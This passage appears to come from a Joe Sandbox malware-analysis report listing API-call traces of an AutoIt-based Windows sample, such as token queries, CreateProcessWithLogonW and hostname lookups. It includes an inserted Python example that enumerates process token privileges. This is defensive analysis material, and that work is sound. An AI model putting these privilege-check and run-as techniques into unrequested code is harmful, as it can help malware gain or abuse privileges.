                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                        • String ID:
                                        • API String ID: 1378193009-0
                                        • Opcode ID: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                                        • Instruction ID: f803c777e958a5c75cd72d8bf9b2111a819b8bc15d8fc13c0b3b7aa029d8ef0b
                                        • Opcode Fuzzy Hash: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                                        • Instruction Fuzzy Hash: 4A21DDB0908744AFEB339B24DC45BEBBBECDF11308F04109EE69DA6185D7745A849B51
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ED8B2A
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00ED8B31
                                        • CloseHandle.KERNEL32(00000004), ref: 00ED8B4B
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED8B7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 2621361867-0
                                        • Opcode ID: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                                        • Instruction ID: ad4c9a9aadc5ae8a0494ad93ccf1dd4a6073ecf9d2b675c7823d85bb5c8fdb0d
                                        • Opcode Fuzzy Hash: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                                        • Instruction Fuzzy Hash: 76116AB650020DABDF118FA4EE49FDE7BA9FF08708F045066FE04A2160C7729D65EB61
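The two token-handling records above (the GetTokenInformation/LookupPrivilegeValueW/_memcmp routine at 00ED8652 and the OpenProcessToken/CreateProcessWithLogonW routine at 00ED8B2A) follow a standard Win32 pattern: open the process token, probe GetTokenInformation(TokenPrivileges) to learn the buffer size, allocate, call again, then look up a privilege name and compare its LUID against each entry in the array. The following is an added example written for this page, not code from the Joe Sandbox report or from the analysed sample. It reproduces that call sequence with ctypes on Windows and, so the comparison logic can be exercised offline, also parses a constructed TOKEN_PRIVILEGES buffer. The privilege name checked (SeDebugPrivilege) is an assumption; the report does not show which name the sample passes to LookupPrivilegeValueW.

```python
"""Token privilege check mirroring the call sequence in the records above.

Added example; not from the report or the sample. Sequence reproduced:
  OpenProcessToken -> GetTokenInformation(TokenPrivileges) size probe
  -> GetLastError == ERROR_INSUFFICIENT_BUFFER -> allocate -> second call
  -> LookupPrivilegeValueW(name) -> compare LUIDs (the _memcmp step).
"""
import struct
import sys

TOKEN_PRIVILEGES = 3               # TOKEN_INFORMATION_CLASS value passed in the listing
TOKEN_QUERY = 0x0008
ERROR_INSUFFICIENT_BUFFER = 122
SE_PRIVILEGE_ENABLED = 0x00000002
SE_DEBUG_LUID = (20, 0)            # SE_DEBUG_PRIVILEGE from winnt.h as (LowPart, HighPart)
LUID_AND_ATTRIBUTES_FMT = "<IiI"   # DWORD LowPart, LONG HighPart, DWORD Attributes (12 bytes)


def parse_token_privileges(buf: bytes):
    """Decode a raw TOKEN_PRIVILEGES blob: DWORD PrivilegeCount followed by
    PrivilegeCount LUID_AND_ATTRIBUTES entries. Returns [((low, high), attrs), ...]."""
    (count,) = struct.unpack_from("<I", buf, 0)
    entries = []
    for i in range(count):
        low, high, attrs = struct.unpack_from(LUID_AND_ATTRIBUTES_FMT, buf, 4 + 12 * i)
        entries.append(((low, high), attrs))
    return entries


def has_privilege(entries, luid):
    """The comparison step: walk the array and compare each LUID with the
    looked-up one, as the _memcmp call does. Returns (present, enabled)."""
    for cur, attrs in entries:
        if cur == luid:
            return True, bool(attrs & SE_PRIVILEGE_ENABLED)
    return False, False


def build_token_privileges(entries):
    """Constructed TOKEN_PRIVILEGES buffer for offline use; on Windows the
    second GetTokenInformation call fills the equivalent bytes."""
    data = struct.pack("<I", len(entries))
    for (low, high), attrs in entries:
        data += struct.pack(LUID_AND_ATTRIBUTES_FMT, low, high, attrs)
    return data


def current_process_privileges():
    """Windows only: OpenProcessToken plus the two-call GetTokenInformation idiom."""
    import ctypes
    from ctypes import wintypes

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    k32.GetCurrentProcess.restype = wintypes.HANDLE
    k32.CloseHandle.argtypes = [wintypes.HANDLE]
    adv.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    adv.GetTokenInformation.argtypes = [wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                        wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]

    token = wintypes.HANDLE()
    if not adv.OpenProcessToken(k32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        needed = wintypes.DWORD(0)
        adv.GetTokenInformation(token, TOKEN_PRIVILEGES, None, 0, ctypes.byref(needed))
        if ctypes.get_last_error() != ERROR_INSUFFICIENT_BUFFER:
            raise ctypes.WinError(ctypes.get_last_error())
        buf = ctypes.create_string_buffer(needed.value)
        if not adv.GetTokenInformation(token, TOKEN_PRIVILEGES, buf, needed.value, ctypes.byref(needed)):
            raise ctypes.WinError(ctypes.get_last_error())
        return parse_token_privileges(buf.raw)
    finally:
        k32.CloseHandle(token)


def lookup_privilege_luid(name: str):
    """Windows only: LookupPrivilegeValueW, returning the LUID as (LowPart, HighPart)."""
    import ctypes
    from ctypes import wintypes

    class LUID(ctypes.Structure):
        _fields_ = [("LowPart", wintypes.DWORD), ("HighPart", wintypes.LONG)]

    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    adv.LookupPrivilegeValueW.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, ctypes.POINTER(LUID)]
    luid = LUID()
    if not adv.LookupPrivilegeValueW(None, name, ctypes.byref(luid)):
        raise ctypes.WinError(ctypes.get_last_error())
    return (luid.LowPart, luid.HighPart)


if __name__ == "__main__":
    if sys.platform == "win32":
        entries = current_process_privileges()
        luid = lookup_privilege_luid("SeDebugPrivilege")  # assumed privilege name
    else:
        # Constructed sample: SeDebugPrivilege enabled, SeBackupPrivilege (LUID 17) present but disabled.
        entries = parse_token_privileges(build_token_privileges(
            [(SE_DEBUG_LUID, SE_PRIVILEGE_ENABLED), ((17, 0), 0)]))
        luid = SE_DEBUG_LUID
    print("SeDebugPrivilege present/enabled:", has_privilege(entries, luid))
```

The two-call GetTokenInformation idiom is what produces the GetLastError/GetProcessHeap/RtlAllocateHeap trio between the two calls in the listing; a single call with a fixed buffer would not. For detection work, the sequence OpenProcessToken, GetTokenInformation(3) and LookupPrivilegeValueW followed by CreateProcessWithLogonW is a privilege check preceding a run-as-other-user launch, which is how the AutoIt runtime implements its RunAs family of functions.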
                                        APIs
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                                        • gethostbyname.WS2_32(?), ref: 00EF66AC
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF66B7
                                        • _memmove.LIBCMT ref: 00EF66E4
                                        • inet_ntoa.WS2_32(?), ref: 00EF66EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 1504782959-0
                                        • Opcode ID: 8b43e3433f2cbf5bd01cbd2008c9efc754fa32122b047d5312727a1fabc4aefe
                                        • Instruction ID: d5f22b2553ea1d581e38e90b7d29c482d95ebbe00a8ab1159d9697cc10ec211d
                                        • Opcode Fuzzy Hash: 8b43e3433f2cbf5bd01cbd2008c9efc754fa32122b047d5312727a1fabc4aefe
                                        • Instruction Fuzzy Hash: C6110A36900509ABCB04FBA4DD86DEEB7F8BF58310B145065F50AB71A2DF30AE04DB61
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED9043
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9055
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED906B
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9086
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                                        • Instruction ID: c142b6c7c5ea844939fce7221466bb97d98c21ce2fbb86ef7063f1c164533823
                                        • Opcode Fuzzy Hash: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                                        • Instruction Fuzzy Hash: 5E115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204096E904B7290D6726E11DB90
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE166F
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE1694
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE169E
                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE16D1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                                        • Instruction ID: 975ac6c50239a7cb2f2da9e8baefeaca263e9220018766cb9c759ee5ed75523f
                                        • Opcode Fuzzy Hash: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                                        • Instruction Fuzzy Hash: B9116131C0055ED7CF10AFA6D948AEEBF78FF09751F455099E941B6240CB3055A0DBD6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                        • Instruction ID: c8ddb803551c503431d02664974b3fbdf66d69d9261d14d2f44d9447e9bc8ed9
                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                        • Instruction Fuzzy Hash: A901807205414ABBCF125E84CC018EE3F62BF99345F099515FE9868831D237C9B1AB81
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00F0B59E
                                        • ScreenToClient.USER32(?,?), ref: 00F0B5B6
                                        • ScreenToClient.USER32(?,?), ref: 00F0B5DA
                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0B5F5
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                                        • Instruction ID: 238caa0db0aa26c3ac00f18011a016a5a71d980b0e87ea3491fb7ceace73d799
                                        • Opcode Fuzzy Hash: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                                        • Instruction Fuzzy Hash: CA1146B5D0020DEFDB51CF99C8449EEFBB9FB08311F104166E914E3620D735AA559F50
                                        APIs
                                        • _memset.LIBCMT ref: 00F0B8FE
                                        • _memset.LIBCMT ref: 00F0B90D
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                                        • CloseHandle.KERNEL32 ref: 00F0B94E
                                        Similarity
                                        • API ID: _memset$CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3277943733-0
                                        • Opcode ID: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                                        • Instruction ID: 7b44dbe38d8cd852df88c63f64fd2c59d097946e1c2eb9a6b23c60136c2c9be6
                                        • Opcode Fuzzy Hash: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                                        • Instruction Fuzzy Hash: C3F089B55443087BF6203771AC45F7B7A9CEB1A774F001420BF08D5292D7755D08A7E8
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00EE6E88
                                          • Part of subcall function 00EE794E: _memset.LIBCMT ref: 00EE7983
                                        • _memmove.LIBCMT ref: 00EE6EAB
                                        • _memset.LIBCMT ref: 00EE6EB8
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE6EC8
                                        Similarity
                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                        • String ID:
                                        • API String ID: 48991266-0
                                        • Opcode ID: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                                        • Instruction ID: 13d513b36a52386e37c3e503ff8f7b76f3aa8ae6011097de08bb33e607ce022b
                                        • Opcode Fuzzy Hash: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                                        • Instruction Fuzzy Hash: A2F0543A100204ABCF116F55DC85A49BB69EF49320F048061FE086E217C731E951DBB4
                                        APIs
                                          • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                                          • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                                          • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C030
                                        • LineTo.GDI32(00000000,?,?), ref: 00F0C03D
                                        • EndPath.GDI32(00000000), ref: 00F0C04D
                                        • StrokePath.GDI32(00000000), ref: 00F0C05B
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                                        • Instruction ID: 01a9b11ef6dfb0652765e1215df6be5d6b7bcc10fb0a2a4171b3d20ac0e17389
                                        • Opcode Fuzzy Hash: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                                        • Instruction Fuzzy Hash: E9F0BE3100025DBBDB226F50AC09FCE3F98BF16320F048100FA11A14E287B50569FBD5
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                                        • GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                                        • AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: aec30449d10e64d0d06d0ad62e944e20641e924b55f362ff0d01132ba86b1ee4
                                        • Instruction ID: df4d992b058998bead3a4935919ac33da755fae2aa0277e6e848113bbeabfa7e
                                        • Opcode Fuzzy Hash: aec30449d10e64d0d06d0ad62e944e20641e924b55f362ff0d01132ba86b1ee4
                                        • Instruction Fuzzy Hash: FDE0A531545228BADB205FA2DC0DEDB7E5DFF167A1F048035B50995460CA72C645ABA1
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 00E82231
                                        • SetTextColor.GDI32(?,000000FF), ref: 00E8223B
                                        • SetBkMode.GDI32(?,00000001), ref: 00E82250
                                        • GetStockObject.GDI32(00000005), ref: 00E82258
                                        • GetWindowDC.USER32(?,00000000), ref: 00EBC0D3
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBC0E0
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00EBC0F9
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00EBC112
                                        • GetPixel.GDI32(00000000,?,?), ref: 00EBC132
                                        • ReleaseDC.USER32(?,00000000), ref: 00EBC13D
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        • Opcode ID: 96148fb70cef16048622eae5dd13737ca353dc3db9eee698fa53ea7e8a335aef
                                        • Instruction ID: ce205c6011112767ac53fbb6b79edf741db160163c5e9ac5e24471337ff254dc
                                        • Opcode Fuzzy Hash: 96148fb70cef16048622eae5dd13737ca353dc3db9eee698fa53ea7e8a335aef
                                        • Instruction Fuzzy Hash: 03E06D32504248EBDB315FA8FC0D7D83B20FB05336F148366FA69A80E187714994EB12
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 00ED8C63
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C6A
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ED882E), ref: 00ED8C77
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C7E
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 0f672e291d416232f69b80d6d9cc9b7fe60d5d77e0d9a51b7b81036c574253a7
                                        • Instruction ID: ed63babdb02e4a3681a54b84725ddff2e23c0d1a06626631041781e23808257e
                                        • Opcode Fuzzy Hash: 0f672e291d416232f69b80d6d9cc9b7fe60d5d77e0d9a51b7b81036c574253a7
                                        • Instruction Fuzzy Hash: 49E08636642215DBD7305FB06E0CB567BBCFF50796F054828B245D9040DA34844ADB71
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00EC2187
                                        • GetDC.USER32(00000000), ref: 00EC2191
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                                        • ReleaseDC.USER32(?), ref: 00EC21D2
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 5959a4aa24b7667b0c74201ffb44d47f87345a3da5bf693a1e2fbd486a5d2642
                                        • Instruction ID: 77c468a5847aaeae54e28ba67f2c7831720ffb6ed14101b0539867670df82430
                                        • Opcode Fuzzy Hash: 5959a4aa24b7667b0c74201ffb44d47f87345a3da5bf693a1e2fbd486a5d2642
                                        • Instruction Fuzzy Hash: 3EE01A75800608EFDB51AFB0C808BAD7BF1FB4C350F108429F95AE7620CB3A9146AF40
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00EC219B
                                        • GetDC.USER32(00000000), ref: 00EC21A5
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                                        • ReleaseDC.USER32(?), ref: 00EC21D2
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: e65963737b52aad4371de162e575b01345278acd5dca64080ce9cb220b181ac0
                                        • Instruction ID: ef13efeadada6baa45df78f5037ded7438194431aa058971084bd85ec58c52ca
                                        • Opcode Fuzzy Hash: e65963737b52aad4371de162e575b01345278acd5dca64080ce9cb220b181ac0
                                        • Instruction Fuzzy Hash: 33E012B5800608AFCB61AFB0C8086AD7BF1FB4C310F108029F95EE7620CB3A9145AF40
                                        APIs
                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00EDB981
                                        Strings
                                        Similarity
                                        • API ID: ContainedObject
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3565006973-3941886329
                                        • Opcode ID: c0b3cce4802c99f588c0b12bdc03430cba81ba30b460f15f732438fab91c4d37
                                        • Instruction ID: a5dc764df59942174fab0c5500b03436b592ef83394607838a31d05da5307091
                                        • Opcode Fuzzy Hash: c0b3cce4802c99f588c0b12bdc03430cba81ba30b460f15f732438fab91c4d37
                                        • Instruction Fuzzy Hash: 86915A74600201DFDB24CF64C884A6ABBE8FF49710F15956EF94AEB791EBB0E841CB50
                                        APIs
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • __wcsnicmp.LIBCMT ref: 00EEB298
                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EEB361
                                        Strings
                                        Similarity
                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                        • String ID: LPT
                                        • API String ID: 3222508074-1350329615
                                        • Opcode ID: 1f3a34d51852c22414929d36ca67578eb6a709c74fec57113e86e3d75c32b8af
                                        • Instruction ID: 5d94b78c467286b09d90488521dff42df67e965493703c1244184d7ee8531830
                                        • Opcode Fuzzy Hash: 1f3a34d51852c22414929d36ca67578eb6a709c74fec57113e86e3d75c32b8af
                                        • Instruction Fuzzy Hash: 73617175E00219AFCB14EF95C882EAEB7F4EF48310F15506AF54ABB291DB70AE40CB51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: Oa
                                        • API String ID: 4104443479-3945284152
                                        • Opcode ID: 5c57662299954293e01341a0eb6a689f3b5d9126a54e4216f67ac50917b3e913
                                        • Instruction ID: eb68414843b8b9b1964fb5aa2b2c337a8741862d1fca662cc880ec06e76ac8bc
                                        • Opcode Fuzzy Hash: 5c57662299954293e01341a0eb6a689f3b5d9126a54e4216f67ac50917b3e913
                                        • Instruction Fuzzy Hash: F45130B49006099FCF64CF68C680AAEB7F1FF44318F14552EE85AE7250EB31AD56CB51
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00E92AC8
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E92AE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: beecb776050d9a6afcc11ba82a9999fde2a72ac70ef7beb4be5cd62c60033e17
                                        • Instruction ID: aeca2ee04c78effefe43b0801468c075133f254276cfb9b47bc47533760b8a0c
                                        • Opcode Fuzzy Hash: beecb776050d9a6afcc11ba82a9999fde2a72ac70ef7beb4be5cd62c60033e17
                                        • Instruction Fuzzy Hash: 9E5158718187489BD320BF50D886BAFBBE8FF84314F56485DF1DD510A2DB709929CB16
                                        APIs
                                          • Part of subcall function 00E8506B: __fread_nolock.LIBCMT ref: 00E85089
                                        • _wcscmp.LIBCMT ref: 00EE9AAE
                                        • _wcscmp.LIBCMT ref: 00EE9AC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscmp$__fread_nolock
                                        • String ID: FILE
                                        • API String ID: 4029003684-3121273764
                                        • Opcode ID: d158019799a0179a09110f9d9c012ded9d4bc579da9f71b6e74ab4ce50e7a410
                                        • Instruction ID: 13c6d88903cd0a3b3a20490dfea66d37967d3eebb2eb2851191a8fd1f1cfd48a
                                        • Opcode Fuzzy Hash: d158019799a0179a09110f9d9c012ded9d4bc579da9f71b6e74ab4ce50e7a410
